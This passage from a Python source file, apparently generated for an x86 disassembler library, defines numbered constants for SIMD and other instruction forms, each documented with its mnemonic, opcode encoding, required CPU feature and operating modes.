``VPADDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FD /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDW_YMM_YMM_YMMM256: int = 2548
"""
``VPADDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FD /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDW_XMM_K1Z_XMM_XMMM128: int = 2549
"""
``VPADDW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG FD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDW_YMM_K1Z_YMM_YMMM256: int = 2550
"""
``VPADDW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG FD /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDW_ZMM_K1Z_ZMM_ZMMM512: int = 2551
"""
``VPADDW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG FD /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDD_MM_MMM64: int = 2552
"""
``PADDD mm, mm/m64``
``NP 0F FE /r``
``MMX``
``16/32/64-bit``
"""
PADDD_XMM_XMMM128: int = 2553
"""
``PADDD xmm1, xmm2/m128``
``66 0F FE /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDD_XMM_XMM_XMMM128: int = 2554
"""
``VPADDD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FE /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDD_YMM_YMM_YMMM256: int = 2555
"""
``VPADDD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FE /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDD_XMM_K1Z_XMM_XMMM128B32: int = 2556
"""
``VPADDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 FE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDD_YMM_K1Z_YMM_YMMM256B32: int = 2557
"""
``VPADDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 FE /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPADDD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2558
"""
``VPADDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 FE /r``
``AVX512F``
``16/32/64-bit``
"""
UD0_R16_RM16: int = 2559
"""
``UD0 r16, r/m16``
``o16 0F FF /r``
``286+``
``16/32/64-bit``
"""
UD0_R32_RM32: int = 2560
"""
``UD0 r32, r/m32``
``o32 0F FF /r``
``386+``
``16/32/64-bit``
"""
UD0_R64_RM64: int = 2561
"""
``UD0 r64, r/m64``
``o64 0F FF /r``
``X64``
``64-bit``
"""
PSHUFB_MM_MMM64: int = 2562
"""
``PSHUFB mm1, mm2/m64``
``NP 0F 38 00 /r``
``SSSE3``
``16/32/64-bit``
"""
PSHUFB_XMM_XMMM128: int = 2563
"""
``PSHUFB xmm1, xmm2/m128``
``66 0F 38 00 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSHUFB_XMM_XMM_XMMM128: int = 2564
"""
``VPSHUFB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 00 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFB_YMM_YMM_YMMM256: int = 2565
"""
``VPSHUFB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 00 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFB_XMM_K1Z_XMM_XMMM128: int = 2566
"""
``VPSHUFB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 00 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFB_YMM_K1Z_YMM_YMMM256: int = 2567
"""
``VPSHUFB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 00 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFB_ZMM_K1Z_ZMM_ZMMM512: int = 2568
"""
``VPSHUFB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 00 /r``
``AVX512BW``
``16/32/64-bit``
"""
PHADDW_MM_MMM64: int = 2569
"""
``PHADDW mm1, mm2/m64``
``NP 0F 38 01 /r``
``SSSE3``
``16/32/64-bit``
"""
PHADDW_XMM_XMMM128: int = 2570
"""
``PHADDW xmm1, xmm2/m128``
``66 0F 38 01 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHADDW_XMM_XMM_XMMM128: int = 2571
"""
``VPHADDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 01 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHADDW_YMM_YMM_YMMM256: int = 2572
"""
``VPHADDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 01 /r``
``AVX2``
``16/32/64-bit``
"""
PHADDD_MM_MMM64: int = 2573
"""
``PHADDD mm1, mm2/m64``
``NP 0F 38 02 /r``
``SSSE3``
``16/32/64-bit``
"""
PHADDD_XMM_XMMM128: int = 2574
"""
``PHADDD xmm1, xmm2/m128``
``66 0F 38 02 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHADDD_XMM_XMM_XMMM128: int = 2575
"""
``VPHADDD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 02 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHADDD_YMM_YMM_YMMM256: int = 2576
"""
``VPHADDD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 02 /r``
``AVX2``
``16/32/64-bit``
"""
PHADDSW_MM_MMM64: int = 2577
"""
``PHADDSW mm1, mm2/m64``
``NP 0F 38 03 /r``
``SSSE3``
``16/32/64-bit``
"""
PHADDSW_XMM_XMMM128: int = 2578
"""
``PHADDSW xmm1, xmm2/m128``
``66 0F 38 03 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHADDSW_XMM_XMM_XMMM128: int = 2579
"""
``VPHADDSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 03 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHADDSW_YMM_YMM_YMMM256: int = 2580
"""
``VPHADDSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 03 /r``
``AVX2``
``16/32/64-bit``
"""
PMADDUBSW_MM_MMM64: int = 2581
"""
``PMADDUBSW mm1, mm2/m64``
``NP 0F 38 04 /r``
``SSSE3``
``16/32/64-bit``
"""
PMADDUBSW_XMM_XMMM128: int = 2582
"""
``PMADDUBSW xmm1, xmm2/m128``
``66 0F 38 04 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPMADDUBSW_XMM_XMM_XMMM128: int = 2583
"""
``VPMADDUBSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 04 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMADDUBSW_YMM_YMM_YMMM256: int = 2584
"""
``VPMADDUBSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 04 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMADDUBSW_XMM_K1Z_XMM_XMMM128: int = 2585
"""
``VPMADDUBSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 04 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDUBSW_YMM_K1Z_YMM_YMMM256: int = 2586
"""
``VPMADDUBSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 04 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2587
"""
``VPMADDUBSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 04 /r``
``AVX512BW``
``16/32/64-bit``
"""
PHSUBW_MM_MMM64: int = 2588
"""
``PHSUBW mm1, mm2/m64``
``NP 0F 38 05 /r``
``SSSE3``
``16/32/64-bit``
"""
PHSUBW_XMM_XMMM128: int = 2589
"""
``PHSUBW xmm1, xmm2/m128``
``66 0F 38 05 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHSUBW_XMM_XMM_XMMM128: int = 2590
"""
``VPHSUBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 05 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHSUBW_YMM_YMM_YMMM256: int = 2591
"""
``VPHSUBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 05 /r``
``AVX2``
``16/32/64-bit``
"""
PHSUBD_MM_MMM64: int = 2592
"""
``PHSUBD mm1, mm2/m64``
``NP 0F 38 06 /r``
``SSSE3``
``16/32/64-bit``
"""
PHSUBD_XMM_XMMM128: int = 2593
"""
``PHSUBD xmm1, xmm2/m128``
``66 0F 38 06 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHSUBD_XMM_XMM_XMMM128: int = 2594
"""
``VPHSUBD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 06 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHSUBD_YMM_YMM_YMMM256: int = 2595
"""
``VPHSUBD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 06 /r``
``AVX2``
``16/32/64-bit``
"""
PHSUBSW_MM_MMM64: int = 2596
"""
``PHSUBSW mm1, mm2/m64``
``NP 0F 38 07 /r``
``SSSE3``
``16/32/64-bit``
"""
PHSUBSW_XMM_XMMM128: int = 2597
"""
``PHSUBSW xmm1, xmm2/m128``
``66 0F 38 07 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPHSUBSW_XMM_XMM_XMMM128: int = 2598
"""
``VPHSUBSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 07 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPHSUBSW_YMM_YMM_YMMM256: int = 2599
"""
``VPHSUBSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 07 /r``
``AVX2``
``16/32/64-bit``
"""
PSIGNB_MM_MMM64: int = 2600
"""
``PSIGNB mm1, mm2/m64``
``NP 0F 38 08 /r``
``SSSE3``
``16/32/64-bit``
"""
PSIGNB_XMM_XMMM128: int = 2601
"""
``PSIGNB xmm1, xmm2/m128``
``66 0F 38 08 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSIGNB_XMM_XMM_XMMM128: int = 2602
"""
``VPSIGNB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 08 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSIGNB_YMM_YMM_YMMM256: int = 2603
"""
``VPSIGNB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 08 /r``
``AVX2``
``16/32/64-bit``
"""
PSIGNW_MM_MMM64: int = 2604
"""
``PSIGNW mm1, mm2/m64``
``NP 0F 38 09 /r``
``SSSE3``
``16/32/64-bit``
"""
PSIGNW_XMM_XMMM128: int = 2605
"""
``PSIGNW xmm1, xmm2/m128``
``66 0F 38 09 /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSIGNW_XMM_XMM_XMMM128: int = 2606
"""
``VPSIGNW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 09 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSIGNW_YMM_YMM_YMMM256: int = 2607
"""
``VPSIGNW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 09 /r``
``AVX2``
``16/32/64-bit``
"""
PSIGND_MM_MMM64: int = 2608
"""
``PSIGND mm1, mm2/m64``
``NP 0F 38 0A /r``
``SSSE3``
``16/32/64-bit``
"""
PSIGND_XMM_XMMM128: int = 2609
"""
``PSIGND xmm1, xmm2/m128``
``66 0F 38 0A /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPSIGND_XMM_XMM_XMMM128: int = 2610
"""
``VPSIGND xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 0A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSIGND_YMM_YMM_YMMM256: int = 2611
"""
``VPSIGND ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 0A /r``
``AVX2``
``16/32/64-bit``
"""
PMULHRSW_MM_MMM64: int = 2612
"""
``PMULHRSW mm1, mm2/m64``
``NP 0F 38 0B /r``
``SSSE3``
``16/32/64-bit``
"""
PMULHRSW_XMM_XMMM128: int = 2613
"""
``PMULHRSW xmm1, xmm2/m128``
``66 0F 38 0B /r``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPMULHRSW_XMM_XMM_XMMM128: int = 2614
"""
``VPMULHRSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 0B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULHRSW_YMM_YMM_YMMM256: int = 2615
"""
``VPMULHRSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 0B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULHRSW_XMM_K1Z_XMM_XMMM128: int = 2616
"""
``VPMULHRSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 0B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHRSW_YMM_K1Z_YMM_YMMM256: int = 2617
"""
``VPMULHRSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 0B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMULHRSW_ZMM_K1Z_ZMM_ZMMM512: int = 2618
"""
``VPMULHRSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 0B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VPERMILPS_XMM_XMM_XMMM128: int = 2619
"""
``VPERMILPS xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 0C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPS_YMM_YMM_YMMM256: int = 2620
"""
``VPERMILPS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 0C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPS_XMM_K1Z_XMM_XMMM128B32: int = 2621
"""
``VPERMILPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 0C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_YMM_K1Z_YMM_YMMM256B32: int = 2622
"""
``VPERMILPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 0C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2623
"""
``VPERMILPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 0C /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMILPD_XMM_XMM_XMMM128: int = 2624
"""
``VPERMILPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.W0 0D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPD_YMM_YMM_YMMM256: int = 2625
"""
``VPERMILPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 0D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPD_XMM_K1Z_XMM_XMMM128B64: int = 2626
"""
``VPERMILPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 0D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_YMM_K1Z_YMM_YMMM256B64: int = 2627
"""
``VPERMILPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 0D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 2628
"""
``VPERMILPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 0D /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VTESTPS_XMM_XMMM128: int = 2629
"""
``VTESTPS xmm1, xmm2/m128``
``VEX.128.66.0F38.W0 0E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VTESTPS_YMM_YMMM256: int = 2630
"""
``VTESTPS ymm1, ymm2/m256``
``VEX.256.66.0F38.W0 0E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VTESTPD_XMM_XMMM128: int = 2631
"""
``VTESTPD xmm1, xmm2/m128``
``VEX.128.66.0F38.W0 0F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VTESTPD_YMM_YMMM256: int = 2632
"""
``VTESTPD ymm1, ymm2/m256``
``VEX.256.66.0F38.W0 0F /r``
``AVX``
``16/32/64-bit``
"""
PBLENDVB_XMM_XMMM128: int = 2633
"""
``PBLENDVB xmm1, xmm2/m128, <XMM0>``
``66 0F 38 10 /r``
``SSE4.1``
``16/32/64-bit``
"""
EVEX_VPSRLVW_XMM_K1Z_XMM_XMMM128: int = 2634
"""
``VPSRLVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLVW_YMM_K1Z_YMM_YMMM256: int = 2635
"""
``VPSRLVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2636
"""
``VPSRLVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 10 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSWB_XMMM64_K1Z_XMM: int = 2637
"""
``VPMOVUSWB xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSWB_XMMM128_K1Z_YMM: int = 2638
"""
``VPMOVUSWB xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 10 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSWB_YMMM256_K1Z_ZMM: int = 2639
"""
``VPMOVUSWB ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 10 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAVW_XMM_K1Z_XMM_XMMM128: int = 2640
"""
``VPSRAVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 11 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAVW_YMM_K1Z_YMM_YMMM256: int = 2641
"""
``VPSRAVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 11 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSRAVW_ZMM_K1Z_ZMM_ZMMM512: int = 2642
"""
``VPSRAVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 11 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSDB_XMMM32_K1Z_XMM: int = 2643
"""
``VPMOVUSDB xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDB_XMMM64_K1Z_YMM: int = 2644
"""
``VPMOVUSDB xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 11 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDB_XMMM128_K1Z_ZMM: int = 2645
"""
``VPMOVUSDB xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 11 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLVW_XMM_K1Z_XMM_XMMM128: int = 2646
"""
``VPSLLVW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 12 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLVW_YMM_K1Z_YMM_YMMM256: int = 2647
"""
``VPSLLVW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 12 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLVW_ZMM_K1Z_ZMM_ZMMM512: int = 2648
"""
``VPSLLVW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 12 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVUSQB_XMMM16_K1Z_XMM: int = 2649
"""
``VPMOVUSQB xmm1/m16 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQB_XMMM32_K1Z_YMM: int = 2650
"""
``VPMOVUSQB xmm1/m32 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 12 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQB_XMMM64_K1Z_ZMM: int = 2651
"""
``VPMOVUSQB xmm1/m64 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 12 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VCVTPH2PS_XMM_XMMM64: int = 2652
"""
``VCVTPH2PS xmm1, xmm2/m64``
``VEX.128.66.0F38.W0 13 /r``
``F16C``
``16/32/64-bit``
"""
VEX_VCVTPH2PS_YMM_XMMM128: int = 2653
"""
``VCVTPH2PS ymm1, xmm2/m128``
``VEX.256.66.0F38.W0 13 /r``
``F16C``
``16/32/64-bit``
"""
EVEX_VCVTPH2PS_XMM_K1Z_XMMM64: int = 2654
"""
``VCVTPH2PS xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPH2PS_YMM_K1Z_XMMM128: int = 2655
"""
``VCVTPH2PS ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPH2PS_ZMM_K1Z_YMMM256_SAE: int = 2656
"""
``VCVTPH2PS zmm1 {k1}{z}, ymm2/m256{sae}``
``EVEX.512.66.0F38.W0 13 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDW_XMMM64_K1Z_XMM: int = 2657
"""
``VPMOVUSDW xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDW_XMMM128_K1Z_YMM: int = 2658
"""
``VPMOVUSDW xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 13 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSDW_YMMM256_K1Z_ZMM: int = 2659
"""
``VPMOVUSDW ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 13 /r``
``AVX512F``
``16/32/64-bit``
"""
BLENDVPS_XMM_XMMM128: int = 2660
"""
``BLENDVPS xmm1, xmm2/m128, <XMM0>``
``66 0F 38 14 /r``
``SSE4.1``
``16/32/64-bit``
"""
EVEX_VPRORVD_XMM_K1Z_XMM_XMMM128B32: int = 2661
"""
``VPRORVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVD_YMM_K1Z_YMM_YMMM256B32: int = 2662
"""
``VPRORVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2663
"""
``VPRORVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 14 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVQ_XMM_K1Z_XMM_XMMM128B64: int = 2664
"""
``VPRORVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVQ_YMM_K1Z_YMM_YMMM256B64: int = 2665
"""
``VPRORVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPRORVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2666
"""
``VPRORVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 14 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQW_XMMM32_K1Z_XMM: int = 2667
"""
``VPMOVUSQW xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQW_XMMM64_K1Z_YMM: int = 2668
"""
``VPMOVUSQW xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 14 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQW_XMMM128_K1Z_ZMM: int = 2669
"""
``VPMOVUSQW xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 14 /r``
``AVX512F``
``16/32/64-bit``
"""
BLENDVPD_XMM_XMMM128: int = 2670
"""
``BLENDVPD xmm1, xmm2/m128, <XMM0>``
``66 0F 38 15 /r``
``SSE4.1``
``16/32/64-bit``
"""
EVEX_VPROLVD_XMM_K1Z_XMM_XMMM128B32: int = 2671
"""
``VPROLVD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVD_YMM_K1Z_YMM_YMMM256B32: int = 2672
"""
``VPROLVD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2673
"""
``VPROLVD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 15 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVQ_XMM_K1Z_XMM_XMMM128B64: int = 2674
"""
``VPROLVQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVQ_YMM_K1Z_YMM_YMMM256B64: int = 2675
"""
``VPROLVQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPROLVQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2676
"""
``VPROLVQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 15 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQD_XMMM64_K1Z_XMM: int = 2677
"""
``VPMOVUSQD xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQD_XMMM128_K1Z_YMM: int = 2678
"""
``VPMOVUSQD xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 15 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVUSQD_YMMM256_K1Z_ZMM: int = 2679
"""
``VPMOVUSQD ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 15 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMPS_YMM_YMM_YMMM256: int = 2680
"""
``VPERMPS ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 16 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMPS_YMM_K1Z_YMM_YMMM256B32: int = 2681
"""
``VPERMPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 16 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 2682
"""
``VPERMPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 16 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPD_YMM_K1Z_YMM_YMMM256B64: int = 2683
"""
``VPERMPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 16 /r``
